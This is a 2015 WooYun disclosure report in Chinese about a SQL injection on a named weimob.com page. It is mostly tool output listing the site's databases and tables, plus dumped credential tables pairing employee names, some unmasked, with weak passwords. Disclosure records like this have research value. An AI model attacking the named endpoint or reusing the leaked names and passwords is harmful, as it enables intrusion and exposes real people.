乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-06: 细节已通知厂商并且等待厂商处理中 2015-08-11: 厂商已经主动忽略漏洞,细节向公众公开
要妹子秋秋吗? 你想要吗?妹子多多,要电话号码吗?你想要吗? 不给你!
http://college.weimob.com/class.php?id=3
注入点
available databases [18]:[*] back_vote_1[*] d_wm_bc[*] d_wm_bc2[*] d_wm_buglist[*] d_wm_college[*] d_wm_shop[*] d_wm_wechat[*] dacheng[*] egg_new[*] egg_old[*] hscontact[*] information_schema[*] magazine[*] meizi[*] mysql[*] test[*] wb[*] wwwhsmobcom
Database: d_wm_buglist[3 tables]+---------------------------------------+| t_wm_bug_log || t_wm_list || t_wm_user |+---------------------------------------+Database: dacheng[93 tables]+---------------------------------------+| dede_addon18 || dede_addonarticle || dede_addonarticle17 || dede_addonimages || dede_addoninfos || dede_addonshop || dede_addonsoft || dede_addonspec || dede_admin || dede_admintype || dede_advancedsearch || dede_arcatt || dede_arccache || dede_archives || dede_arcmulti || dede_arcrank || dede_arctiny || dede_arctype || dede_area || dede_channeltype || dede_co_htmls || dede_co_mediaurls || dede_co_note || dede_co_onepage || dede_co_urls || dede_diyforms || dede_dl_log || dede_downloads || dede_erradd || dede_feedback || dede_flink || dede_flinktype || dede_freelist || dede_guestbook || dede_homepageset || dede_keywords || dede_log || dede_mail_order || dede_mail_title || dede_mail_type || dede_member || dede_member_company || dede_member_feed || dede_member_flink || dede_member_friends || dede_member_group || dede_member_guestbook || dede_member_model || dede_member_msg || dede_member_operation || dede_member_person || dede_member_pms || dede_member_snsmsg || dede_member_space || dede_member_stow || dede_member_stowtype || dede_member_tj || dede_member_type || dede_member_vhistory || dede_moneycard_record || dede_moneycard_type || dede_mtypes || dede_multiserv_config || dede_myad || dede_myadtype || dede_mytag || dede_payment || dede_plus || dede_purview || dede_pwd_tmp || dede_ratings || dede_scores || dede_search_cache || dede_search_keywords || dede_sgpage || dede_shops_delivery || dede_shops_orders || dede_shops_products || dede_shops_userinfo || dede_softconfig || dede_sphinx || dede_stepselect || dede_sys_enum || dede_sys_module || dede_sys_set || dede_sys_task || dede_sysconfig || dede_tagindex || dede_taglist || dede_uploads || dede_verifies || dede_vote || dede_vote_member |+---------------------------------------+Database: back_vote_1[13 tables]+---------------------------------------+| t_wm_v2 || t_wm_v2_log || t_wm_v2_options || t_wm_v2_original || t_wm_v2_share_log || t_wm_v2_statistic || t_wm_v2_user || t_wm_v2_user_game_day || t_wm_vote || t_wm_vote_options || t_wm_vote_user || t_wm_xauth_bind || t_wm_xauth_user |+---------------------------------------+Database: d_wm_wechat[97 tables]+---------------------------------------+| t_wm_activity_sncode || t_wm_activity_users || t_wm_admin || t_wm_agent || t_wm_agent_consume || t_wm_albums || t_wm_albums_pic || t_wm_announce || t_wm_app_config || t_wm_bc_auth || t_wm_bc_category || t_wm_bc_keyword || t_wm_big_wheel || t_wm_bindlog || t_wm_business || t_wm_car_brand || t_wm_car_case || t_wm_car_case_custom || t_wm_car_model || t_wm_car_picfull || t_wm_car_reserve || t_wm_car_reserve_custom || t_wm_car_sell || t_wm_car_series || t_wm_car_set || t_wm_car_tool || t_wm_card_info || t_wm_card_manager || t_wm_coupons || t_wm_custom_keyword || t_wm_custom_keyword2 || t_wm_custom_menu || t_wm_custom_reply_lbs || t_wm_custom_reply_music || t_wm_custom_reply_news || t_wm_custom_reply_text || t_wm_estate_album || t_wm_estate_category || t_wm_estate_expert || t_wm_estate_house || t_wm_estate_impress_system || t_wm_estate_impress_user || t_wm_estate_picfull || t_wm_estate_set || t_wm_exam || t_wm_exam_question || t_wm_exam_sncode || t_wm_exam_test || t_wm_exam_users || t_wm_exam_users_logs || t_wm_grade || t_wm_hotel || t_wm_hotel_order || t_wm_hotel_room || t_wm_invite_code || t_wm_ip || t_wm_logskeyword || t_wm_logsscore || t_wm_mcard || t_wm_mcardreceive || t_wm_mconsumption || t_wm_member_coupon || t_wm_member_gift || t_wm_member_recharge || t_wm_membercard || t_wm_message || t_wm_message_black || t_wm_message_config || t_wm_mprivileges || t_wm_notice || t_wm_outside_link || t_wm_plcaccount || t_wm_reg_config || t_wm_reg_customer || t_wm_region || t_wm_register || t_wm_reserve || t_wm_reserve_custom || t_wm_score || t_wm_scratch_card || t_wm_service_config || t_wm_store || t_wm_survey || t_wm_survey_options || t_wm_survey_userinfo || t_wm_survey_useroption || t_wm_user || t_wm_vote || t_wm_vote_options || t_wm_vote_user || t_wm_web_desktop_menus || t_wm_webclass || t_wm_webconfig || t_wm_webmenu || t_wm_webplugmenu || t_wm_webslide || v_wm_shop_auth |+---------------------------------------+Database: d_wm_bc[9 tables]+---------------------------------------+| t_wm_account || t_wm_bc_ad_picture || t_wm_bc_ad_place || t_wm_bc_ad_rebind || t_wm_bc_auth || t_wm_bc_category || t_wm_bc_keyword || t_wm_bc_region || t_wm_bc_typical |+---------------------------------------+Database: d_wm_college[10 tables]+---------------------------------------+| t_wm_admin || t_wm_article || t_wm_banner || t_wm_company || t_wm_course || t_wm_course_apply || t_wm_index_config || t_wm_job || t_wm_student || t_wm_teacher |+---------------------------------------+Database: egg_new[2 tables]+---------------------------------------+| t_wm_egg_sncode || t_wm_egg_users |+---------------------------------------+Database: d_wm_shop[13 tables]+---------------------------------------+| t_wm_address || t_wm_cat || t_wm_deliverymode || t_wm_express || t_wm_member || t_wm_menu || t_wm_norm || t_wm_order || t_wm_orderproduct || t_wm_product || t_wm_rule || t_wm_submenu || t_wm_type |+---------------------------------------+Database: information_schema[28 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: d_wm_bc2[7 tables]+---------------------------------------+| t_wm_account || t_wm_bc_ad_picture || t_wm_bc_ad_place || t_wm_bc_auth || t_wm_bc_category || t_wm_bc_keyword || t_wm_bc_region |+---------------------------------------+
账号密码 一大堆
+-------+---------------+| name | password |+-------+---------------+| admin | Sq*********** |+-------+---------------+
+--------+-----------+| name | password |+--------+-----------+| 吕春* | 123456 || 黄海* | 123456 || 苏* | 123456 || 崔向* | 123456 || 任励* | 123456 || 夏笑* | 123456 || 闻生* | 123456 || 薛富玮 | 123456 || 王* | 123456 || 孙光* | 123456 || 张付* | 123456 || 赵振* | 123456 || 赵喜* | 123456 || 丁瑶 | 111111 || 张梦* | 123456 || 李明* | 123456 || 朱秀* | 123456 || 颜育* | 123456 || 陈* | 123456 || 于德* | 123456 || 甘超* | 123456 || 张* | 123456 || 张* | 123456 || 赵*娜 | 123456 || 苏* | 123456 || 王慧* | 123456 || ri*e | rice!@#$% || 杜守* | 123456 || 张晓* | 123456 || 黄骏* | hellogod |+--------+-----------+
下面是员工信息, 由于涉及资料,我就不贴出来了,看图
孙总应该会
危害等级:无影响厂商忽略
忽略时间:2015-08-11 09:32
漏洞Rank:15 (WooYun评价)
暂无